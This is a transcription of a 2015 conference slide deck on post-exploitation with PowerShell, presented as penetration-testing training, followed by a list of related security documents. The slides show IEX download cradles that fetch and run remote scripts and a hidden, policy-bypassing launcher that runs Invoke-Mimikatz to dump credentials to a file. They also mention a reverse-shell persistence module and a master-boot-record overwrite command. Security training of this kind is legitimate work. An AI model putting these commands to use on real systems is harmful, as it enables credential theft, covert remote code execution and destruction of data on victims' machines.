POST-EXPLOITATION WITH WINDOWS POWERSHELL
|
|
- Dorthy Short
- 6 years ago
- Views:
Transcription
1 POST-EXPLOITATION WITH WINDOWS POWERSHELL Jerold Hoong, OSCP Associate, Singapore 27 th May 2015 ASPAC Hacknet Conference and Security Training
2 Agenda No. CHAPTER 1 PowerShell Exploitation Frameworks 3 Overview on PowerSploit and Veil-PowerTools s PowerUp Module 4 Installing PowerSploit / PowerUp 5 Network of Demo Scenario 6 Demo 7 Next Steps? 8 Questions and Answers ~EOF~ 1
3 What is this presentation about? This presentation will showcase the use of PowerShell scripting exploitation frameworks coupled with various penetration testing tools and AV evasion techniques for post-exploitation on compromised hosts. Mimikatz Click to edit Master title style 2
4 PowerShell 101 What is PowerShell? Similar to Unix s Bash Shell, aka Bash for Windows Task-based command-line shell and scripting language Installed by default on Windows Server 2008, 2012, 7, 8 and 10 Used by system administrators to automate tasks and configure windows servers Why use PowerShell as an attacker? Provides access to almost everything on a Window s platform Supported on Windows XP Easy to learn and powerful Has the ability to execute scripts in memory (AV evasion) Has a powerful scripting environment bundled together (PowerShell ISE) 3
5 Exploitation Frameworks PowerSploit Collection of Microsoft PowerShell modules and scripts that can be used to aid penetration testers during all phases of an assessment. Available in Kali Linux by default at /usr/share/powersploit (git clone to get the bleeding edge ). Written by Matt Graeber. Veil-PowerTools Collection of PowerShell modules and scripts with a focus on offensive operations. Consists of PewPewPew, PowerBreach, PowerPick, PowerUp and PowerView components. The PowerUp component will be shown in the demo later. Written Nishang Framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation. Written by Nikhil Mittal. 4
6 Overview of PowerSploit Categories of PowerShell Scripts in PowerSploit Code Execution (DLL and Shellcode Injection) Script Modification (Script encryption, encoding and compression utility) Persistence (Backdoor) Antivirus Bypass Exfiltration Mayhem Recon Code Execution Invoke-Shellcode The Invoke-Shellcode function available from the Invoke-Shellcode.ps1 script allows injection of shellcode into the process ID of your choice or into PowerShell locally. This functionality will be demonstrated in the demo scenario later. 5
7 Overview of Veil-PowerTools s PowerUp PowerUp! PowerUp was created to allow a clean way to audit client systems for common Windows privilege escalation vectors. It utilizes various service abuse checks,.dll hijacking opportunities, registry checks, and more to enumerate common ways that you might be able to elevate on a target system. Module Functions Service Enumeration Service Abuse DLL Hijacking Registry Checks Misc. Checks More on this in the demo later. 6
8 Installing PowerSploit / PowerUp It is simple: git clone: git clone: Alternatively, you can download the zip archive directly from GitHub. 7
9 Importing Modules and Scripts There are 2 ways to import modules and scripts: 1. Normal way, requires module/script to be on the host locally. Import-Module <Module/Script> OR 2. Quick way, module/script can be at a remote location and imported into PowerShell s memory context using the IEX download cradle: IEX (New-Object Net.Webclient).DownloadString( ) 8
10 Importing Modules and Scripts Using the IEX cradle to download and load a script straight from GitHub 9
11 Network of Demo Scenario Simplified Demo Scenario VICTIM WINDOWS PC Network: /24 ATTACKER KALI LINUX
12 Techniques Covered in the Demo Pre- Exploitation Reconnaissance Conducting discovery scans with ARP and port scanner tools Post-Exploitation with Limited Access User Account Identifying current available privileges Checking running services for misconfigurations Obtaining a stealthy meterpreter shell Using ring0 kernel exploits for privilege escalation Post-Exploitation with Full Administrator Account Dumping account credentials with the mimikatz tool Enabling RDP remotely to gain interactive access Running exfiltration tools like keyloggers 11
13 Demo 12
14 Demo srvcheck3.exe Sample Output 13
15 Next Steps? Now that we have full administrator access, what else could PowerSploit do? You can experiment with the different modules, such as: Persistence.ps1 Allows you to have persistent access to the compromised host, such as automatically running a reverse tcp shell connection back to your attacking Kali Host every time a victim user logs in successfully. 14
16 Next Steps? Invoke-Mimikatz.ps1 Dump Windows credentials using Mimikatz, which we already did with the msfconsole. Example: powershell IEX (New-Object Net.Webclient).DownloadString (" Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds 15
17 Next Steps? Example: OFF PowerShell.exe -windowstyle hidden -NoProfile -Command "& {Start-Process PowerShell.exe -ArgumentList '-windowstyle hidden -NoProfile -ExecutionPolicy Bypass -File ""%~dpn0.ps1""' -Verb RunAs} -passwd.ps1 $ScriptPath = Split-Path -parent $MyInvocation.MyCommand.Definition IEX (New-Object Net.Webclient).DownloadString(" owersploit/master/exfiltration/invoke-mimikatz.ps1") Invoke-Mimikatz -DumpCreds > $scriptpath/pass.txt 16
18 Next Steps? Invoke-Portscan.ps1 (Alternative if no Nmap is installed on compromised host) Conduct further recon on compromised host s network. Example: Invoke-Portscan -Hosts /24 -T 4 -TopPorts 25 -oa localnet 17
19 Next Steps? Mayhem Module: Set-MasterBootRecord -BootMessage ~Quick Demo~ 18
20 Questions? 19
21 Sources and References No URL Framework/PowerTools/master/PowerUp/README.md 20
22 ~EOF~ 21
23 Thank you Presentation by Jerold Hoong
24 2015 KPMG LLP, a UK limited liability partnership, is a subsidiary of KPMG Europe LLP and a member firm of the KPMG network of independent member firms affiliated with KPMG International Cooperative, a Swiss entity. All rights reserved. The KPMG name, logo and cutting through complexity are registered trademarks or trademarks of KPMG International Cooperative (KPMG International).
The Veil-Framework. Will Veris Group Adaptive Threat Division
The Veil-Framework Will (@harmj0y) Veris Group Adaptive Threat Division The Veil-Framework A toolset aiming to bridge the gap between pentesting and red teaming capabilities Veil-Evasion: flagship tool,
More informationLethal Client Side Attacks using PowerShell. Nikhil Mittal
Lethal Client Side Attacks using PowerShell Nikhil Mittal Get-Host SamratAshok Twitter - @nikhil_mitt Blog http://labofapenetrationtester.com Creator of Kautilya and Nishang Interested in Offensive Information
More informationModule 1: Penetration Testing Planning and Scoping. Module 2: Basic Usage of Linux and its services
Following topics will be covered: Module 1: Penetration Testing Planning and Scoping - Types of penetration testing and ethical hacking projects - Penetration testing methodology - Limitations and benefits
More informationHacking Our Way to Better Security: Lessons from a Web Application Penetration Test. Tyler Rasmussen Mercer Engineer Research Center
Hacking Our Way to Better Security: Lessons from a Web Application Penetration Test Tyler Rasmussen Mercer Engineer Research Center About Me Cybersecurity Engineering Intern @ MERC Senior IT/Cybersecurity
More informationPenetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security No part of this publication, in whole or in part, may
More informationLateral Movement Defcon 26. Walter Mauricio
Lateral Movement 101 @ Defcon 26 Walter Cuestas @wcu35745 Mauricio Velazco @mvelazco About Workshop goals Lab Environment Hands-on exercises & CTF #Whoarewe Walter Cuestas (@wcu35745) Mauricio Velazco
More informationDetecting Modern PowerShell Attacks with SIEM
SEC555 Presentation based on SEC555: SIEM with Tactical Analytics Detecting Modern PowerShell Attacks with SIEM Justin Henderson (GSE # 108) @SecurityMapper About Us Author of SEC555: SIEM with Tactical
More informationCyber Common Technical Core (CCTC) Advance Sheet Windows Operating Systems
Cyber Common Technical Core (CCTC) Advance Sheet Windows Operating Systems Section 1: Command Line Tools Skill 1: Employ commands using command line interface 1.1 Use command line commands to gain situational
More informationAbusing Bash on Windows
Abusing Bash on Windows Antoine Cervoise [AbusingBashForWindows]-[External]-[Final]- v[1.0] Who am I? Antoine Cervoise - @acervoise Pentester @NTT Security FR I like Arduinos, passwords, phishing emails,
More informationAudience. Pre-Requisites
T R A N C H U L A S W O R K S H O P S A N D T R A I N I N G S Hands-On Penetration Testing Training Course About Tranchulas Tranchulas is a multinational information security company having its offices
More informationHackveda Training - Ethical Hacking, Networking & Security
Hackveda Training - Ethical Hacking, Networking & Security Day1: Hacking windows 7 / 8 system and security Part1 a.) Windows Login Password Bypass manually without CD / DVD b.) Windows Login Password Bypass
More informationCoding for Penetration
Coding for Penetration Testers Building Better Tools Jason Andress Ryan Linn ELSEVIER AMSTERDAM BOSTON HEIDELBERG LONDON NEW YORK OXFORD PARIS SAN DIEGO SAN FRANCISCO SINGAPORE SYDNEY TOKYO Syngress is
More informationTexSaw Penetration Te st in g
TexSaw Penetration Te st in g What is penetration testing? The process of breaking something or using something for an unintended used case for the purpose of bettering the system or application. This
More informationCoding for Penetration Testers Building Better Tools
Coding for Penetration Testers Building Better Tools Second Edition Jason Andress Ryan Linn Clara Hartwell, Technical Editor ELSEVIER AMSTERDAM BOSTON HEIDELBERG LONDON NEW YORK OXFORD PARIS SAN DIEGO
More informationCPTE: Certified Penetration Testing Engineer
www.peaklearningllc.com CPTE: Certified Penetration Testing Engineer (5 Days) *Includes exam voucher, course video, an exam preparation guide About this course Certified Penetration Testing Engineer certification
More informationAUTHOR CONTACT DETAILS
AUTHOR CONTACT DETAILS Name Dinesh Shetty Organization Paladion Networks Email ID dinesh.shetty@paladion.net Penetration Testing with Metasploit Framework When i say "Penetration Testing tool" the first
More informationCONTENTS IN DETAIL. FOREWORD by HD Moore ACKNOWLEDGMENTS INTRODUCTION 1 THE ABSOLUTE BASICS OF PENETRATION TESTING 1 2 METASPLOIT BASICS 7
CONTENTS IN DETAIL FOREWORD by HD Moore xiii PREFACE xvii ACKNOWLEDGMENTS xix Special Thanks... xx INTRODUCTION xxi Why Do A Penetration Test?... xxii Why Metasploit?... xxii A Brief History of Metasploit...
More informationAdvanced Ethical Hacking & Penetration Testing. Ethical Hacking
Summer Training Internship Program 2017 (STIP - 2017) is a practical oriented & industrial level training program for all students who have aspiration to work in the core technical industry domain. This
More informationHacker Academy Ltd COURSES CATALOGUE. Hacker Academy Ltd. LONDON UK
Hacker Academy Ltd COURSES CATALOGUE Hacker Academy Ltd. LONDON UK TABLE OF CONTENTS Basic Level Courses... 3 1. Information Security Awareness for End Users... 3 2. Information Security Awareness for
More informationSecurity Hygiene. Be in a defensible position. Be cyber resilient. November 8 th, 2017
Security Hygiene Be in a defensible position. Be cyber resilient. November 8 th, 2017 Agenda Getting defensive How will we do it? Basic hygiene stuff Getting started Questions Introductions Over 20 years
More informationدوره تست نفوذ. Ver.1.2 شما میتوانید آنلاین در این دوره ثبت نام بلافاصله از آن استفاده کنید. Information Gathering. Bash scripting
Ver.1.2 Information Gathering Bash scripting Information gathering (passive) شما میتوانید آنلاین در این دوره ثبت نام کنید و بلافاصله از آن استفاده کنید. دیدن نمونه آموزش هاي دوره تست نفوذ Google operators
More informationContents in Detail. Foreword by Peter Van Eeckhoutte
Contents in Detail Foreword by Peter Van Eeckhoutte xix Acknowledgments xxiii Introduction xxv A Note of Thanks.... xxvi About This Book.... xxvi Part I: The Basics.... xxvii Part II: Assessments.........................................
More informationCYBERSECURITY PROFESSIONAL PENETRATION TESTER
2018 CYBERSECURITY PROFESSIONAL PENETRATION TESTER DIVERGENCE ACADEMY 11/3/2018 TABLE OF CONTENTS NETWORK EXPLOITATION AND PENTESTING... 4 WIRELESS PENTESTING AND NETWORK EXPLOITATION... 6 PYTHON FOR PENTESTERS...
More informationMetasploit Unleashed. Class 1: Metasploit Fundamentals. Georgia Weidman Director of Cyberwarface, Reverse Space
Metasploit Unleashed Class 1: Metasploit Fundamentals Georgia Weidman Director of Cyberwarface, Reverse Space Acknowledgments Metasploit Team Offensive Security/Metasploit Unleashed Hackers for Charity
More information3. Apache Server Vulnerability Identification and Analysis
1. Target Identification The pentester uses netdiscover to identify the target: root@kali:~# netdiscover -r 192.168.0.0/24 Target: 192.168.0.48 (Cadmus Computer Systems) Note: the victim IP address changes
More informationCSC 5930/9010 Offensive Security: OSINT
CSC 5930/9010 Offensive Security: OSINT Professor Henry Carter Spring 2019 Recap Designing shellcode requires intimate knowledge of assembly, system calls, and creative combinations of operations But allows
More informationPENETRATION TESTING. A HattdA-Oti Introduction. to Hacking. by Georgia Weidman. <e> no starch. press. San Francisco
PENETRATION TESTING A HattdA-Oti Introduction to Hacking by Georgia Weidman no starch press San Francisco CONTENTS IN DETAIL FOREWORD by Peter Van Eeckhoutte xix ACKNOWLEDGMENTS xxiii INTRODUCTION
More informationPwn ing you(r) cyber offenders
Pwn ing you(r) cyber offenders Presented by: Piotr Duszynski @drk1wi ;WHOAMI;#? Senior Security Consultant @Trustwave (OSCE, OSCP, ) In security field for the past 6 years, hacking since 9 Enjoys security
More informationICS Penetration Testing
Connor Leach Jackson Evans-Davies 18 June, 2018 ICS Penetration Testing Understanding the Challenges and Techniques Introductions 1 Connor Leach, GPEN, OSCP - Senior Penetration Tester - Member of Canadian
More informationETHICAL HACKING & COMPUTER FORENSIC SECURITY
ETHICAL HACKING & COMPUTER FORENSIC SECURITY Course Description From forensic computing to network security, the course covers a wide range of subjects. You will learn about web hacking, password cracking,
More informationADVERSARIAL APPROACH TO IMPROVE DETECTION CAPABILITIES
ADVERSARIAL APPROACH TO IMPROVE DETECTION CAPABILITIES Massimo Bozza Ethical Hacker Senior Security Engineer @maxbozza Pietro Romano Principal Security Engineer @tribal_sec AGENDA Adversarial approach
More informationPractical Anti-virus Evasion
Practical Anti-virus Evasion by Daniel Sauder During a penetration test, situation might occur where it is possible to upload and remotely execute a binary file. For example, you can execute the file on
More informationA YEAR OF PURPLE. By Ryan Shepherd
A YEAR OF PURPLE By Ryan Shepherd WHOAMI DETECTION and RESPONSE Investigator for Countercept Threat Hunter PURPLE Team Consultant Offensive Security Certified Professional (OSCP) Crest Registered Intrusion
More information(Re)Investigating PowerShell Attacks
(Re)Investigating PowerShell Attacks BruCON 0x0A Retro Talks Matt Hastings, Ryan Kazanciyan 2 Investigating PowerShell Attacks, 2014 Desired State: Compromised, 2015 3 Revisiting Investigating PowerShell
More informationActive Directory Attacks and Detection
Active Directory Attacks and Detection #Whoami Working as an Information Security Executive Blog : www.akijosberryblog.wordpress.com You can follow me on Twitter: @AkiJos This talk is Based on Tim Madin
More informationRemote social engineering techniques involving Microsoft Universal Naming Convention (UNC) function.
10 March 2016 Remote social engineering techniques involving Microsoft Universal Naming Convention (UNC) function. Presented by Neil Lines Who am I? Neil Lines - Pen Tester Involved in a range of security
More informationDefinitive Guide to PENETRATION TESTING
Definitive Guide to PENETRATION TESTING Chapter 1 Getting To Know Penetration Testing A. What is Penetration Testing? Penetration Testing, pen testing, or ethical hacking is the process of assessing an
More informationPENETRATION TESTING EXTREME VERSION 1
PENETRATION TESTING EXTREME VERSION 1 The world s most advanced network penetration testing course elearnsecurity has been chosen by students in over 140 countries in the world and by leading organizations
More informationCarlos Perez TrustedSec Research Practice Lead
Carlos Perez TrustedSec Research Practice Lead Carlos Perez has been active in the security community since 1999 when he began working for the government of Puerto Rico, and he now leads TrustedSec's research
More informationBojan Ždrnja, CISSP, GCIA, GCIH, GWAPT INFIGO IS
Laterally pwning Windows Bojan Ždrnja, CISSP, GCIA, GCIH, GWAPT Bojan.Zdrnja@infigo.hr INFIGO IS http://www.infigo.hr Who am I? Senior information security consultant at INFIGO IS Penetration testing (all
More informationn Explain penetration testing concepts n Explain vulnerability scanning concepts n Reconnaissance is the first step of performing a pen test
Chapter Objectives n Explain penetration testing concepts n Explain vulnerability scanning concepts Chapter #4: Threats, Attacks, and Vulnerabilities Vulnerability Scanning and Penetration Testing 2 Penetration
More informationPwn ing you(r) cyber offenders
Pwn ing you(r) cyber offenders Presented by: Piotr Duszynski @drk1wi ;WHOAMI;#? Senior Security Consultant @Trustwave OSCP, OSCE, CEH In security field for the past 6 years, hacking since 9 Enjoys security
More informationCLICK TO EDIT MASTER TITLE RECENT STYLE APT CAMPAIGN TARGETING ENERGY SECTOR ASSETS
National Cybersecurity and Communications Integration Center (NCCIC) Hunt and Incident Response Team (HIRT) CLICK TO EDIT MASTER TITLE RECENT STYLE APT CAMPAIGN TARGETING ENERGY SECTOR ASSETS Jonathan
More informationLeveraging ediscovery Technology for Internal Audit 2016 Houston IIA 7th Annual Conference
Leveraging ediscovery Technology for Internal Audit 2016 Houston IIA 7th Annual Conference April 11, 2016 kpmg.com Agenda 1. Survey said 2. Leveraging ediscovery technology to audit risk a. IP threat assessment
More informationWHITE PAPER. INVESTIGATING POWERSHELL ATTACKS Black Hat USA Authors: Ryan Kazanciyan, Matt Hastings SECURITY REIMAGINED
WHITE PAPER INVESTIGATING POWERSHELL ATTACKS Black Hat USA 2014 Authors: Ryan Kazanciyan, Matt Hastings SECURITY REIMAGINED CONTENTS Introduction and Prior Research...3 Assumptions...4 Testing Methodology...5
More informationMcAfee Certified Assessment Specialist Network
McAfee MA0-150 McAfee Certified Assessment Specialist Network Version: 4.0 Topic 1, Volume A QUESTION NO: 1 An attacker has compromised a Linux/Unix host and discovers a suspicious file called "password"
More informationPowerShell Deep Dive:
PowerShell Deep Dive: A United Threat Research Report A data analysis of how PowerShell is being used for malicious intent, based on 1,100 investigations conducted by more than two dozen Carbon Black security
More informationWho Am I. Chris Gates
Metasploit Basics Who Am I Chris Gates CISSP, GCIH, CPTS, CEH, A+, Network+, Security+, MCP 2003 Columnist on EthicalHacker.net VP of Operations LearnSecurityOnline.com Why am I here Talk about the Metasploit
More informationALL ROADS LEAD TO DOMAIN ADMIN BREACH TO CDE A SECTOR CONFERENCE PRESENTATION OCTOBER 2016
BREACH TO CDE ALL ROADS LEAD TO DOMAIN ADMIN A SECTOR CONFERENCE PRESENTATION OCTOBER 2016 Introduction Yannick Bedard Security Consultant Network Penetration Testing SpiderLabs, Trustwave email: ybedard.infosec@gmail.com
More informationPOWERSHELL: FROM ATTACKERS' TO DEFENDERS' PERSPECTIVE
POWERSHELL: FROM ATTACKERS' TO DEFENDERS' PERSPECTIVE Elliott Neo and Crystal Tan AGENDA Trends and Attacks Logs PowerShell Logs PowerShell Versions Sysmon Logs Mitigations Restricted RunSpace Constrained
More informationWHITEPAPER ATTIVO NETWORKS THREATDEFEND PLATFORM AND THE MITRE ATT&CK MATRIX
WHITEPAPER ATTIVO NETWORKS THREATDEFEND PLATFORM AND THE MITRE ATT&CK MATRIX 1 INTRODUCTION The MITRE Corporation Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK ) Matrix provides a model
More informationAdvanced Penetration Testing The Ultimate Penetration Testing Standard
The Ultimate Penetration Testing Standard COURSE DESCRIPTION ADVANCED PENETRATION TESTING The program is created as a progression for ECSA credential professionals. The course is designed to show the advanced
More informationA Game between Adversary and AI Scientist
A Game between Adversary and AI Scientist NULLCON March 3, 2018 Satnam, Arunabha, Deepak, Waseem, Nirmesh, Santosh, Balamurali, Narayana Acalvio Technologies Who am I At Acalvio from Day 1 15+ Years in
More informationTactics, Techniques, and Procedures
Dec 8, 2017 This report maps Cobalt Strike's actions to MITRE's Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) matrix. Command-Line Interface Command-line interfaces provide a way of interacting
More informationIT Audit Auditing IT General Controls
IT Audit Auditing IT General Controls Agenda Introduction IT Audit IT General Controls Overview Access to Programs and Data Program Change & Development Computer Operations Lessons Learned from Regulatory
More informationCisco Advanced Malware Protection (AMP) for Endpoints
Cisco Advanced Malware Protection (AMP) for Endpoints Endpoints continue to be the primary point of entry for attacks! 70% of breaches start on endpoint devices WHY? Gaps in protection Gaps in visibility
More informationWEBSHELL TO PHISHING UDURRANI
WEBSHELL TO PHISHING UDURRANI SUMMARY: Attacker uploads the master webshell Attacker sets a password [ sha1(md5(password)) ] Attacker is able to load multiple modules including: { explorer", "terminal",
More informationREPORT INVESTIGATING POWERSHELL ATTACKS SECURITY REIMAGINED
REPORT INVESTIGATING POWERSHELL ATTACKS SECURITY REIMAGINED CONTENTS Introduction and Prior Research...3 Assumptions...4 Testing Methodology...5 Findings and Sources of Evidence...5 Registry... 5 Prefetch...6
More informationSECURITY TESTING: WINDOWS OS
International Journal of Latest Research In Engineering and Computing (IJLREC) Volume 2, Issue 6, Page No. 1-11 www.ijlrec.com ISSN: 2347-6540 SECURITY TESTING: WINDOWS OS 1 Siddhanth Lathar, 2 Dr. Ashish
More informationModern Day Penetration Testing Distribution Open Source Platform - Kali Linux - Study Paper
Modern Day Penetration Testing Distribution Open Source Platform - Kali Linux - Study Paper Devanshu Bhatt Abstract: Penetration testing is extremely crucial method to discover weaknesses in systems and
More informationIMEC Cybersecurity for Manufacturers Penetration Testing and Top 10
IMEC Cybersecurity for Manufacturers Penetration Testing and Top 10 Christian Espinosa, Alpine Security www.alpinesecurity.com 1 Objectives Learn about penetration testing Learn what to consider when selecting
More informationBecoming the Adversary
SESSION ID: CIN-R06 Becoming the Adversary Tyrone Erasmus Managing Security Consultant MWR InfoSecurity @metall0id /usr/bin/whoami Most public research == Android Something different today 2 Overview Introduction
More informationPost Connection Attacks
Post Connection Attacks All the attacks we carried out in the previous sections can be done without knowing the key to the AP, ie: without connecting to the target network. We saw how we can control all
More informationUniversity of Piraeus
University of Piraeus Department of Digital Systems Post Graduate Studies Master Thesis Computer Laboratory Setup for the Assessment of State-of-the-Art Penetration Testing Tools George Diathesopoulos
More informationReduce the Breach Detection Gap to Minutes. What is Forensic State Analysis (FSA)?
Reduce the Breach Detection Gap to Minutes Whether cloud-hosted or situated on premise, Cyber Threat Hunting as a Service is an essential and complimentary addition to any organization serious about security.
More informationAnti-Virus Comparative
Anti-Virus Comparative Advanced Endpoint Protection Test Language: English November 2017 Last Revision: 23 rd March 2018 Commissioned by Bitdefender - 1 - Table of Contents Executive Summary 3 Tested products
More informationCompTIA Security+ Malware. Threats and Vulnerabilities Vulnerability Management
CompTIA Security+ Lecture Six Threats and Vulnerabilities Vulnerability Management Copyright 2011 - VTC Malware Malicious code refers to software threats to network and systems, including viruses, Trojan
More informationRiskSense Attack Surface Validation for Web Applications
RiskSense Attack Surface Validation for Web Applications 2018 RiskSense, Inc. Keeping Pace with Digital Business No Excuses for Not Finding Risk Exposure We needed a faster way of getting a risk assessment
More informationExam4Free. Free valid exam questions and answers for certification exam prep
Exam4Free http://www.exam4free.com Free valid exam questions and answers for certification exam prep Exam : MA0-150 Title : McAfee Certified Assessment Specialist- UH Vendors : McAfee Version : DEMO Get
More informationNmap & Metasploit. Chun-Jen (James) Chung. Arizona State University
Nmap & Metasploit Chun-Jen (James) Chung Nmap recap Nmap uses raw IP packets in novel ways to determine what hosts are available on the network What services (application name and version) those hosts
More informationEvaluating Website Security with Penetration Testing Methodology
Evaluating Website Security with Penetration Testing Methodology D. Menoski, P. Mitrevski and T. Dimovski St. Clement of Ohrid University in Bitola/Faculty of Technical Sciences, Bitola, Republic of Macedonia
More informationKERBEROS PARTY TRICKS
KERBEROS PARTY TRICKS Weaponizing Kerberos Protocol Flaws Geoffrey Janjua Who is Exumbra Operations Group? Security services and consulting Specialized services: Full scope red-team testing, digital and
More informationIoT Vulnerabilities. By Troy Mattessich, Raymond Fradella, and Arsh Tavi. Contribution Distribution
Security Penetration Through IoT Vulnerabilities By Troy Mattessich, Raymond Fradella, and Arsh Tavi Contribution Distribution Arsh Tavi Troy Mattessich Raymond Fradella Conducted research and compiled
More informationCross Platform Penetration Testing Suite
Cross Platform Penetration Testing Suite Ms. Shyaml Virnodkar, Rahul Gupta, Tejas Bharambe 1Asst Professor, Department of Computer Engineering, K J Somaiya Institute of Engineering and Information Technology,
More informationSANS Hackfest. Secret Pentesting Techniques Part 2. Dave Kennedy Founder, @HackingDave
SANS Hackfest Secret Pentesting Techniques Part 2 Dave Kennedy Founder, CEO Twitter: @TrustedSec, @Binary_Defense @HackingDave David&Kennedy s&background& Founder of TrustedSec. Co-Founder and CTO Binary
More informationCSWAE Certified Secure Web Application Engineer
CSWAE Certified Secure Web Application Engineer Overview Organizations and governments fall victim to internet based attacks every day. In many cases, web attacks could be thwarted but hackers, organized
More informationHacking in the Attack Kill Chain
Hacking in the Attack Kill Chain Håkan Nohre, Consulting Systems Engineer, GIAC GPEN #9666, CISSP #76731 Erkan Djafer, Consulting Systems Engineer, CISSP #535930 Chung-wai Lee, Cyber Security Partner Account
More informationEthical Hacking Series: 0x01 - Hacking Methodologies. JaxHax Makerspace Travis Phillips
Ethical Hacking Series: 0x01 - Hacking Methodologies JaxHax Makerspace Travis Phillips About Me Member of Jax Hax since it opened. Specializes in Ethical Hacking, IT Security, and penetration testing.
More informationLive Adversary Simulation: Red and Blue Team Tactics
SESSION ID: HTA-T06 Live Adversary Simulation: Red and Blue Team Tactics James Lyne Head of R&D SANS Institute @JamesLyne Stephen Sims Security Researcher & Fellow SANS Institute @Steph3nSims Agenda 2
More informationID: Sample Name: 21PO jpg...js Cookbook: default.jbs Time: 14:32:06 Date: 21/11/2017 Version:
ID: 371 Sample Name: 21PO201745.jpg...js Cookbook: default.jbs Time: 14:32:0 Date: 21/11/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview Information Detection Confidence
More informationPenetration testing using Kali Linux - Network Discovery
Penetration testing using Kali Linux - Network Discovery by Riazul H. Rozen Sept. 14, 2017 4 minute read Table of Contents Importance of penetration testing Kali Linux in penetration testing Network Discovery
More informationAttacking and Defending Active Directory July, 2017
Attacking and Defending Active Directory July, 2017 About: Adam Steed - @aboy 20 years of experience in IAM, working for financial, websites, and healthcare organizations Associate Director Protiviti Security
More informationWeb Application & Web Server Vulnerabilities Assessment Pankaj Sharma
Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma Indian Computer Emergency Response Team ( CERT - IN ) Department Of Information Technology 1 Agenda Introduction What are Web Applications?
More informationExam Questions MA0-150
Exam Questions MA0-150 McAfee Certified Assessment Specialist- UH https://www.2passeasy.com/dumps/ma0-150/ 1.An attacker has compromised a Linux/Unix host and discovers a suspicious file called "password"
More informationThe Rise and Fall of
The Rise and Fall of AMSI @Tal_Liberman About me @Tal_Liberman Research & Reverse Engineering Founder @ Polarium Previously Head of Research Team @ ensilo #ProcessDoppelgänging #AtomBombing Overview Introduction
More informationOWASP Broken Web Application Project. When Bad Web Apps are Good
OWASP Broken Web Application Project When Bad Web Apps are Good About Me Mordecai (Mo) Kraushar Director of Audit, CipherTechs OWASP Project Lead, Vicnum OWASP New York City chapter member Assessing the
More informationMcAfee Exploit Prevention Content Release Notes New Windows Signatures
McAfee Exploit Prevention Content 8966 Release Notes 2019-02-12 Content package version for - McAfee Host Intrusion Prevention: 8.0.0.8966 McAfee Endpoint Security Exploit Prevention: 10.6.0.8966 Below
More informationAdvanced Threat Hunting:
Advanced Threat Hunting: Identify and Track Adversaries Infiltrating Your Organization In Partnership with: Presented by: Randeep Gill Tony Shadrake Enterprise Security Engineer, Europe Regional Director,
More informationThreat Hunting via Windows Event Logs. Eric Conrad (GSE
511 Threat Hunting via Windows Event Logs Threat Hunting via Windows Event Logs Eric Conrad (GSE #13) @eric_conrad Welcome! A copy of this talk is available at http://ericconrad.com Includes a link to
More informationContents in Detail. Acknowledgments
Acknowledgments xix Introduction What s in This Book... xxii What Is Ethical Hacking?... xxiii Penetration Testing... xxiii Military and Espionage... xxiii Why Hackers Use Linux... xxiv Linux Is Open Source....
More informationHands-On Ethical Hacking and Network Defense Chapter 6 Enumeration
Hands-On Ethical Hacking and Network Defense Chapter 6 Enumeration Updated 3-3-18 Objectives Describe the enumeration step of security testing Enumerate Microsoft OS targets Enumerate *NIX OS targets Introduction
More informationPost-Exploitation Hunting with ATT&CK & Elastic
Post-Exploitation Hunting with ATT&CK & Elastic John Hubbard @SecHubb SOC Lead at GlaxoSmithKline SANS Author & Instructor SEC455: SIEM Design & Implementation SEC511: Continuous Monitoring & Security
More informationFILELESSMALW ARE PROTECTION TEST OCTOBER2017
FILELESSMALW ARE PROTECTION TEST OCTOBER2017 1 / 12 INTRODUCTION In times of digitalization of each aspect of public and private life new and interesting techniques of bypassing protections are abundant.
More informationEthical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities
Ethical Hacking and Countermeasures: Web Chapter 3 Web Application Vulnerabilities Objectives After completing this chapter, you should be able to: Understand the architecture of Web applications Understand
More informationCyberP3i Hands-on Lab Series
CyberP3i Hands-on Lab Series Lab Series using NETLAB Designer: Dr. Lixin Wang, Associate Professor Hands-On Lab for Application Attacks The NDG Security+ Pod Topology Is Used 1. Introduction In this lab,
More informationPrinciples of ICT Systems and Data Security
Principles of ICT Systems and Data Security Ethical Hacking Ethical Hacking What is ethical hacking? Ethical Hacking It is a process where a computer security expert, who specialises in penetration testing
More informationIntegrate Viper business antivirus EventTracker Enterprise
Integrate Viper business antivirus EventTracker Enterprise Publication Date: June 2, 2016 EventTracker 8815 Centre Park Drive Columbia MD 21045 www.eventtracker.com Abstract This guide provides instructions
More informationCisco Advanced Malware Protection (AMP) for Endpoints Security Testing
Cisco Advanced Malware Protection (AMP) for Endpoints Security Testing 7 September 2018 DR180821E Miercom.com www.miercom.com Contents 1.0 Executive Summary... 3 2.0 Test Summary... 4 3.0 Product Tested...
More informationht IE exploit analysis
ht 2013 004 IE exploit analysis Martin Pozdena Zhongying Qiao Introduction Hacking Team leak from June 2015 revealed some 400 GB of company s internal data including their git repositories. This allowed
More informationLab 3: Introduction to Metasploit
Lab 3: Introduction to Metasploit Aim: The airm of this lab is to develop and execute exploits against a remote machine and test its vulnerabilities using Metasploit. Quick tool introduction: Metasploit
More information